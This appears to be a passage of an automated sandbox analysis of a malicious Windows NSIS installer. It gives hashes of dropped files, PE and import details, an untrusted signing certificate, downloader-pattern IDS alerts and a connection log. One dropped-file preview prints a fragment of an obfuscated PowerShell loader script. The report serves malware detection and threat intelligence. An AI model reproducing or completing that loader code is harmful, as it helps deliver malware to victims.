                                                                                                                                                        SSDEEP:1536:DjNks2ErfhdpphCyq/KDKG9GDIVvt9FLtUOuaeZNwXa:DhN7rfhdpp1qCH+IpEee0Xa
                                                                                                                                                        MD5:1F45559FCFFF86C51F4ABDA260D0B9B3
                                                                                                                                                        SHA1:F8BB784BB245D615B755CD5D7B6344E3A6D9FAD2
                                                                                                                                                        SHA-256:5E33B1687632DED7BA4A2E2C16E088F28FAAA7308FFD5C4D8B022DFB049E91D2
                                                                                                                                                        SHA-512:D6FB73428E776C7094A1A217C7859AD43D276067B1FBF3EA5870FE20BFFBECA1AD134A0D73A8C853DB17F33D3000BB759316ED93E8910B86E53B7EC0E6162EAE
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:$Frederikkes=$Untotalled;........$Lettelsers = @'.Trev.em. Ma tes$Specu,aG Exer oaIllustrm SvrdenoDronapsrFishne.iIn,auti=Lowsedj$Forr tnRStjfilte flippef,unhammrMotorcyiAnderumgNe sgroeSort rsrJerrieaaTufthunnFuges et.oralis;estuari.Ra tlebfOutranmuAlgicgynRe.ablecGennembtGhul bei lipp,roUnchippnRosenbr R.miercWHovedpreAthlothaMisscritBlessinhOutweale TorvedrSving jtThorfiniAargan.g.arabolhPlanocotTopstyk Semicon(Fllesfo$As,iestS cdaniuPeriphebElectregDoitkinavandalinStonelaoTopma iiPostoptdResonan, Aarers$NonadjeVScorpiodhor.tiae BeardsnAnthrandwilderfeCertifisReposef) Po osw ulmina{Langra .Brummes.Unacqu $Glds.orFAlkymiel Bybu.sdShampoonChristmi Ambulan j dstagMadzoonsRepersotInkonveiGoggl edBankiereRituallnCr stal Multipl( BabiromfeltspeiSaltenec GodmodrProjic oSlankklsRepen leOvermelp BepimptBl,dstnu MatinamQuayage Bombar'Aneme tSIndikattTred eryAr urourMoisturiCircumgnC allen.C rpocr$StinnelMantimilaTutankhrBeslagsiWhenceftFiftyo i skandacRgs renSGaufretU lugtfonUnme riaHy.er
                                                                                                                                                        Process:C:\Users\user\Desktop\66776676676.exe
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1592092
                                                                                                                                                        Entropy (8bit):0.15888263670695008
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:soeSIeBIi+CIHPx0zCnX4uXSmBKjtdYKffNFYu5bA+KNiyvYFxUT:G
                                                                                                                                                        MD5:B4834640DF9710A3741E667024766F83
                                                                                                                                                        SHA1:B392E116F95A0388B7D82C7BD453FD4B3AABE9B6
                                                                                                                                                        SHA-256:9091FB5A1B166D03C61848505A440E8B33ACA701DE691D7E4EB8FBFE7379FCAF
                                                                                                                                                        SHA-512:76396F26F236DE394EE3C2441073BF59107F61393E87D730CC70E989582361AACDAEA20E59EA49CC0F125FA6A8405823B17A5D24EC111391E83647FC3687F48C
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:.s...................W.....................................................................................0.......................................................................................................................................................................................................~..........................................................................................................................................................................................................................................................................................................................................................2...........................................................................................j.............................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Users\user\Desktop\66776676676.exe
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):805283
                                                                                                                                                        Entropy (8bit):0.1589716616809398
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:nHrNCx0tE2B2CS9/Nq7r2Cr5WHOKjzQT:rt
                                                                                                                                                        MD5:5ACF4982DBF490AD4AE83C7D1856E89C
                                                                                                                                                        SHA1:66FE8A2B3323ED8CF74FBF6C681D0AA3496A6185
                                                                                                                                                        SHA-256:9F10026E2214CA3C9C59A9AF9913C2EF9C01AC32EFB3A7DB3A2BEC568809904C
                                                                                                                                                        SHA-512:B1BFB5A4FA9B1B7841254161F9347ADC44E3269D13AB7E703A2EC009B95844442E66312436835185E7779673C2E5553659BD85F4B141E5CF907EEE9198EC1F82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:...........................................................................................................................................................................................................................................................................................................................................................................J........\........................................................................................................................................................................................................................................................J..................................................................................M.................c.....................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Users\user\Desktop\66776676676.exe
                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):395
                                                                                                                                                        Entropy (8bit):4.303174937960327
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12:JgWpd0rRenzLLJBl8PjZQbFXEExWTCD/u:SWcrknXlKjZA2ENDm
                                                                                                                                                        MD5:C271D6423649C301105C8A2ECA25F9E4
                                                                                                                                                        SHA1:CFAC3739C43482547D096C88670FA646FB62A56C
                                                                                                                                                        SHA-256:E58319C2FCC8C30C70969BED761493AFD5B7F29D12FDBD1D96C0BBD93EFC6DB2
                                                                                                                                                        SHA-512:B04BBDBA8AFB3D93D6E10C9EA838EC3B2D3798CB0F8C383C44329FA35B4F6E72B4023FB1A6ADAFE49AF258CD876A5BB0A019C742353936EB6C60601937EAF04D
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:crioceras shepard vildfarelserne,lg udgangsvrdiers alkaloids misaimed rabiat skihejsers seashine,impeccancy brndbarestes maskalonges strandvaskers forsikringsaftalelov sportsvognes mirlitons studieegnethedens fontina sprawled..assiento iodizing ferslevs blowbacks mementoernes sinicizing ahura zonal nedkradsende omtydet..spermatin predisable sulphureity.autofermentation symbolry recepturerets,
                                                                                                                                                        Process:C:\Users\user\Desktop\66776676676.exe
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):947949
                                                                                                                                                        Entropy (8bit):0.15996398773946943
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:oASe3amtYNbHv0lnDzgcAUOkEuypx/zSFad:
                                                                                                                                                        MD5:B34FC802327D0F5F02281FD236BD67C6
                                                                                                                                                        SHA1:E7E1E1E5288F16B42FB8B5A62C9B33A4B8D02341
                                                                                                                                                        SHA-256:1B795733FFC880D3DECD0A23BD3CCB22AC6A80EEA5729D407336D891F0523884
                                                                                                                                                        SHA-512:DD170F304175543B07EABE1F09D0548DBE9C332074A0493D1BC4400494356104E16D47C684EB04A04447283427612B1EAE5C40BBB42E087F77FE72C841B9DB7B
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:..........................................................................................................................................................................................................e..................................................................................................................................................................................................................................................................... ...............................................................................................)......................................................................K...............'................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                        Entropy (8bit):7.738928476640035
                                                                                                                                                        TrID:
                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                        File name:66776676676.exe
                                                                                                                                                        File size:571'408 bytes
                                                                                                                                                        MD5:a30468384472782c5b2fc6a439f641bb
                                                                                                                                                        SHA1:2695582dda03035b463e939b1a2577505e9a2766
                                                                                                                                                        SHA256:cee3ae54c0f49335db69551733260a6e0bb7f72089b126b14a09d44722bbdc8f
                                                                                                                                                        SHA512:c2cee48e6c124cbcd2a09e0d0381f38d2602522a5b57577b039aaeb43e4611313c1865c00a98cabacd1edca8b43bbcbad0f6fbb8594c0c36bf4438c57708eaa4
                                                                                                                                                        SSDEEP:12288:g93jlsINtJD2SoxlyLpJdNLNrDv7ucLrv70:g93jlsyUSQ8LpJdNLNrjNPvY
                                                                                                                                                        TLSH:B3C4D098B5A64925C69D0134A2637A0EC27D9FD621E6D042FB757E33F931BACBF00643
                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L....c.W.................^.........
                                                                                                                                                        Icon Hash:1956767870707155
                                                                                                                                                        Entrypoint:0x40322b
                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                        Digitally signed:true
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                        Time Stamp:0x57956393 [Mon Jul 25 00:55:47 2016 UTC]
                                                                                                                                                        TLS Callbacks:
                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                        OS Version Major:4
                                                                                                                                                        OS Version Minor:0
                                                                                                                                                        File Version Major:4
                                                                                                                                                        File Version Minor:0
                                                                                                                                                        Subsystem Version Major:4
                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                        Import Hash:4f67aeda01a0484282e8c59006b0b352
                                                                                                                                                        Signature Valid:false
                                                                                                                                                        Signature Issuer:CN=Efterslag, E=Pelycography@Terminologisk.Stj, O=Efterslag, L=San Diego, OU="Undervisningsprogram Svinerier Valutahandleres ", S=California, C=US
                                                                                                                                                        Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                                        Error Number:-2146762487
                                                                                                                                                        Not Before, Not After
                                                                                                                                                        • 21/02/2024 00:15:36 20/02/2025 00:15:36
                                                                                                                                                        Subject Chain
                                                                                                                                                        • CN=Efterslag, E=Pelycography@Terminologisk.Stj, O=Efterslag, L=San Diego, OU="Undervisningsprogram Svinerier Valutahandleres ", S=California, C=US
                                                                                                                                                        Version:3
                                                                                                                                                        Thumbprint MD5:C0A4DEE4B4AD33337D1CEE01DE5E8EBB
                                                                                                                                                        Thumbprint SHA-1:CCC980DC70EC412EC8A8392BCB2D1EE5FCD35087
                                                                                                                                                        Thumbprint SHA-256:2DD81054DA8DE082C941951A84A29B717FB9BD3DB1623313A4DE86F267B1C8AC
                                                                                                                                                        Serial:762602107C6944D08071AB99AC2BEAF994FB15A6
                                                                                                                                                        Instruction
                                                                                                                                                        sub esp, 00000184h
                                                                                                                                                        push ebx
                                                                                                                                                        push esi
                                                                                                                                                        push edi
                                                                                                                                                        xor ebx, ebx
                                                                                                                                                        push 00008001h
                                                                                                                                                        mov dword ptr [esp+18h], ebx
                                                                                                                                                        mov dword ptr [esp+10h], 00409130h
                                                                                                                                                        mov dword ptr [esp+20h], ebx
                                                                                                                                                        mov byte ptr [esp+14h], 00000020h
                                                                                                                                                        call dword ptr [00407120h]
                                                                                                                                                        call dword ptr [004070ACh]
                                                                                                                                                        cmp ax, 00000006h
                                                                                                                                                        je 00007F0A8C91F983h
                                                                                                                                                        push ebx
                                                                                                                                                        call 00007F0A8C922909h
                                                                                                                                                        cmp eax, ebx
                                                                                                                                                        je 00007F0A8C91F979h
                                                                                                                                                        push 00000C00h
                                                                                                                                                        call eax
                                                                                                                                                        mov esi, 00407298h
                                                                                                                                                        push esi
                                                                                                                                                        call 00007F0A8C922885h
                                                                                                                                                        push esi
                                                                                                                                                        call dword ptr [004070A8h]
                                                                                                                                                        lea esi, dword ptr [esi+eax+01h]
                                                                                                                                                        cmp byte ptr [esi], bl
                                                                                                                                                        jne 00007F0A8C91F95Dh
                                                                                                                                                        push ebp
                                                                                                                                                        push 00000009h
                                                                                                                                                        call 00007F0A8C9228DCh
                                                                                                                                                        push 00000007h
                                                                                                                                                        call 00007F0A8C9228D5h
                                                                                                                                                        mov dword ptr [00423724h], eax
                                                                                                                                                        call dword ptr [00407044h]
                                                                                                                                                        push ebx
                                                                                                                                                        call dword ptr [00407288h]
                                                                                                                                                        mov dword ptr [004237D8h], eax
                                                                                                                                                        push ebx
                                                                                                                                                        lea eax, dword ptr [esp+38h]
                                                                                                                                                        push 00000160h
                                                                                                                                                        push eax
                                                                                                                                                        push ebx
                                                                                                                                                        push 0041ECF0h
                                                                                                                                                        call dword ptr [00407174h]
                                                                                                                                                        push 004091ECh
                                                                                                                                                        push 00422F20h
                                                                                                                                                        call 00007F0A8C9224FFh
                                                                                                                                                        call dword ptr [004070A4h]
                                                                                                                                                        mov ebp, 00429000h
                                                                                                                                                        push eax
                                                                                                                                                        push ebp
                                                                                                                                                        call 00007F0A8C9224EDh
                                                                                                                                                        push ebx
                                                                                                                                                        call dword ptr [00407154h]
                                                                                                                                                        Programming Language:
                                                                                                                                                        • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x74280xa0.rdata
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x380000x1bec0.rsrc
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x8b0900x780
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                        .text0x10000x5dc50x5e00566b191b40fde4369ae73a05b57df1d2False0.6685089760638298data6.47110609300208IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                        .rdata0x70000x12460x14006389f916226544852e494114faf192adFalse0.4271484375data5.0003960999706765IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                        .data0x90000x1a8180x40072dcd89e8824ae186467be61797ed81eFalse0.6474609375data5.220595003364983IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                        .ndata0x240000x140000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                        .rsrc0x380000x1bec00x1c0003d561cd710712943d7c2ece81602a3e4False0.42149135044642855data5.782312893766128IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                        RT_ICON0x382f80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 0EnglishUnited States0.1945019519697149
                                                                                                                                                        RT_ICON0x48b200x65ddPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9937109330060974
                                                                                                                                                        RT_ICON0x4f1000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.35518672199170126
                                                                                                                                                        RT_ICON0x516a80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.43363039399624764
                                                                                                                                                        RT_ICON0x527500x988Device independent bitmap graphic, 24 x 48 x 32, image size 0EnglishUnited States0.5209016393442623
                                                                                                                                                        RT_ICON0x530d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.62677304964539
                                                                                                                                                        RT_DIALOG0x535400x100dataEnglishUnited States0.5234375
                                                                                                                                                        RT_DIALOG0x536400x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                        RT_DIALOG0x537600xc4dataEnglishUnited States0.5918367346938775
                                                                                                                                                        RT_DIALOG0x538280x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                        RT_GROUP_ICON0x538880x5adataEnglishUnited States0.7888888888888889
                                                                                                                                                        RT_VERSION0x538e80x294OpenPGP Secret KeyEnglishUnited States0.5242424242424243
                                                                                                                                                        RT_MANIFEST0x53b800x33dXML 1.0 document, ASCII text, with very long lines (829), with no line terminatorsEnglishUnited States0.5536791314837153
                                                                                                                                                        DLLImport
                                                                                                                                                        KERNEL32.dllCopyFileA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, ReadFile, GetFileAttributesA, SetFileAttributesA, ExitProcess, SetEnvironmentVariableA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, GetCurrentProcess, GetFullPathNameA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, lstrcpynA, SetErrorMode, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
                                                                                                                                                        USER32.dllScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
                                                                                                                                                        GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                                                        SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                                                                                                                                        ADVAPI32.dllRegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                                                                                                        COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                                                                        ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                        EnglishUnited States
                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                        2024-12-19T08:19:27.822396+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449797216.58.208.238443TCP
                                                                                                                                                        2024-12-19T08:19:35.844427+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449820193.122.130.080TCP
                                                                                                                                                        2024-12-19T08:19:38.266331+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449820193.122.130.080TCP
                                                                                                                                                        2024-12-19T08:19:40.133637+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449831172.67.177.134443TCP
                                                                                                                                                        2024-12-19T08:19:41.407147+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449837193.122.130.080TCP
                                                                                                                                                        2024-12-19T08:19:43.022710+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449843172.67.177.134443TCP
                                                                                                                                                        2024-12-19T08:19:44.297581+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449845193.122.130.080TCP
                                                                                                                                                        2024-12-19T08:19:45.902409+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449850172.67.177.134443TCP
                                                                                                                                                        2024-12-19T08:19:54.666017+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449876172.67.177.134443TCP
                                                                                                                                                        2024-12-19T08:19:57.551048+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449883172.67.177.134443TCP
                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                        Dec 19, 2024 08:19:25.209011078 CET49797443192.168.2.4216.58.208.238
                                                                                                                                                        Dec 19, 2024 08:19:25.209063053 CET44349797216.58.208.238192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:25.209137917 CET49797443192.168.2.4216.58.208.238
                                                                                                                                                        Dec 19, 2024 08:19:25.226397991 CET49797443192.168.2.4216.58.208.238
                                                                                                                                                        Dec 19, 2024 08:19:25.226414919 CET44349797216.58.208.238192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:26.919528008 CET44349797216.58.208.238192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:26.919605970 CET49797443192.168.2.4216.58.208.238
                                                                                                                                                        Dec 19, 2024 08:19:26.920274973 CET44349797216.58.208.238192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:26.920325994 CET49797443192.168.2.4216.58.208.238
                                                                                                                                                        Dec 19, 2024 08:19:26.993221998 CET49797443192.168.2.4216.58.208.238
                                                                                                                                                        Dec 19, 2024 08:19:26.993249893 CET44349797216.58.208.238192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:26.993612051 CET44349797216.58.208.238192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:26.993673086 CET49797443192.168.2.4216.58.208.238
                                                                                                                                                        Dec 19, 2024 08:19:26.997903109 CET49797443192.168.2.4216.58.208.238
                                                                                                                                                        Dec 19, 2024 08:19:27.043337107 CET44349797216.58.208.238192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:27.822417021 CET44349797216.58.208.238192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:27.822482109 CET49797443192.168.2.4216.58.208.238
                                                                                                                                                        Dec 19, 2024 08:19:27.822509050 CET44349797216.58.208.238192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:27.822557926 CET49797443192.168.2.4216.58.208.238
                                                                                                                                                        Dec 19, 2024 08:19:27.822640896 CET49797443192.168.2.4216.58.208.238
                                                                                                                                                        Dec 19, 2024 08:19:27.822679043 CET44349797216.58.208.238192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:27.822773933 CET49797443192.168.2.4216.58.208.238
                                                                                                                                                        Dec 19, 2024 08:19:27.991338968 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:27.991379023 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:27.991827965 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:27.991827965 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:27.991858006 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:29.687480927 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:29.687601089 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:29.691344023 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:29.691351891 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:29.691627026 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:29.692790031 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:29.693264961 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:29.739336014 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:32.907169104 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:32.907356024 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:32.920691967 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:32.920793056 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.027561903 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.027668953 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.031677008 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.031775951 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.031789064 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.031919003 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.098907948 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.098985910 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.102828026 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.102890015 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.102921963 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.102988005 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.108644962 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.108704090 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.116442919 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.116513014 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.117856026 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.117917061 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.125576973 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.125754118 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.129060030 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.129127026 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.134716034 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.134785891 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.142973900 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.143114090 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.146764040 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.146853924 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.156254053 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.156424046 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.159255028 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.159333944 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.170013905 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.170094013 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.172811031 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.172893047 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.183691025 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.183801889 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.186572075 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.186671019 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.197371960 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.197467089 CET49806443192.168.2.4172.217.17.65
